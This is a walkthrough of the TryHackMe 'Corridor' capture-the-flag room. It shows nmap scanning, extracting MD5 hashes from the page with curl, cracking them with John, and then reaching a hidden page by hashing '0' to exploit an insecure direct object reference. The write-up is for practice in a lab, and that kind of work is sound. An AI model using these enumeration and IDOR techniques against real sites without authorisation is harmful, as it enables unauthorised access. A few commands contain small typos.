🚪Corridor CTF | TryHackMe

CTF Writeup / Walkthrough for Corridor | Can you escape the Corridor?

Last updated 1 year ago

🚪Corridor CTF | TryHackMe

CTF Writeup / Walkthrough for Corridor | Can you escape the Corridor?

TryHackMe | Corridor

Let’s add the target IP to our host file, in /etc/host

I always make the IP as target.local in /etc/host so that I don’t have to type IP address all the time when engaging for example: in /etc/host I have the following

sudo nano /etc/host

## Targets
192.168.1.1 myrouter.local
TARGET_IP target.local

Initial Recon

We will use N-map and Directory enumeration to get an initial overview of the target

since we are doing a stealth scan we need to use sudo

sudo nmap -sCSV -p- -Pn target.local

Command Parameter’s Explanation :

-sC : Run scripts when nmap finds an open port
-sS : Do an SYN Scan, or stealth scan, to evade Firewalls
-sV : Get the version of the service that is running on the that particular port

-p- : Look for all ports
-Pn : Treat all hosts as online -- skip host discovery

The following should be the expected output

Nmap scan report for target.local
Host is up (0.16s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
7936/tcp  filtered unknown
15239/tcp filtered unknown
20884/tcp filtered unknown
24144/tcp filtered unknown
35478/tcp filtered unknown
39063/tcp filtered vroa
48519/tcp filtered unknown
50423/tcp filtered unknown
51278/tcp filtered unknown
52203/tcp filtered unknown
54695/tcp filtered unknown
56706/tcp filtered unknown
59725/tcp filtered unknown
62079/tcp filtered unknown
63530/tcp filtered unknown
64701/tcp filtered unknown

Let’s see if there are any UDP Ports that are available for us

sudo nmap -sCSVU -p- -Pn target.local

PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc

# It seems that all the ports are filtered and most of it's not required, so let's just focus on one port

PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor

# It seems that the service is running a python server, 
# not much to exploit, it just serves a simple webpage

If we visit target.local it seems that the website only consists of pictures with links, which looks very similar to hashes

A quick one-line bash command will give us the list of all hashes that are available in that particular page

curl target.local | grep -o 'alt="[a-z0-9]\{32\}"' | awk -F '"' '{print $2}'

# This shall generate the following output
<--
c4ca4238a0b923820dcc509a6f75849b
c81e728d9d4c2f636f067f89cc14862c
eccbc87e4b5ce2fe28308fd9f2a7baf3
--

Let’s Check what kind of hash is being used

Use this tool :

Hash Type Identifier - Identify unknown hashes

Attack Phase

Let's use John to crack the hash or you can use the online decrypter such as

https://hashes.com/en/decrypt/hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

# We now have a list of numbers from the hashes
<--
1679091c5a880faf6fb5e6087eb1b2dc:6
45c48cce2e2d7fbdea1afc51c7c6ad26:9
8f14e45fceea167a5a36dedd4bea2543:7
--

Let’s find the missing number, we can use a simple python program that will allow us to generate a missing number from here

# Find Missing Element
def findMissing(arr, N):

	# create a list of zeroes
	temp = [0] * (N+1)

	for i in range(0, N):
		temp[arr[i] - 1] = 1

	for i in range(0, N+1):
		if(temp[i] == 0):
			ans = i + 1

	print(ans)

def MissingNo(arr):
    n = len(arr)
    total = (n + 1)*(n + 2)/2
    arr_sum = sum(arr)
    print(total - arr_sum)

# Driver code
if __name__ == '__main__':
	arr = [6,9,7,4,1,2,8,5,3,11,12,13,10]
	N = len(arr)
	MissingNo(arr)

	# Function call
	#findMissing(arr, N)

We have 14 as an output, let's convert it to an md5 hash :

echo -n "14" | md5sum | awk '{print $1}

# the following is the output 
aab3238922bcc25a6f606eb525ffdc56

Delivery Phase

Let’s use the hash in the URL

curl http://target.local/aab3238922bcc25a6f606eb525ffdc56

We seem to hit a dead end here 😞

To solve this, let's use a hash of number 0 or -1, a common concept within the IDOR Vulnerability realm that the admin account id is mostly 0 or -1 or 1

let's encode 0 as an md5 hash

echo -n 0 | md5sum | awk '{print $1}

# the following output is generated
cfcd208495d565ef66e7_redacted

# Let us append that to the URL of our target
http://target.local/cfcd208495d565_redacted

Exploitation

Now visit the URL you got: http://target.local/cfcd208495d565_redacted

We should now have the flag : REDACTED_FLAG

Thanks for reading, hope you learned something new 😎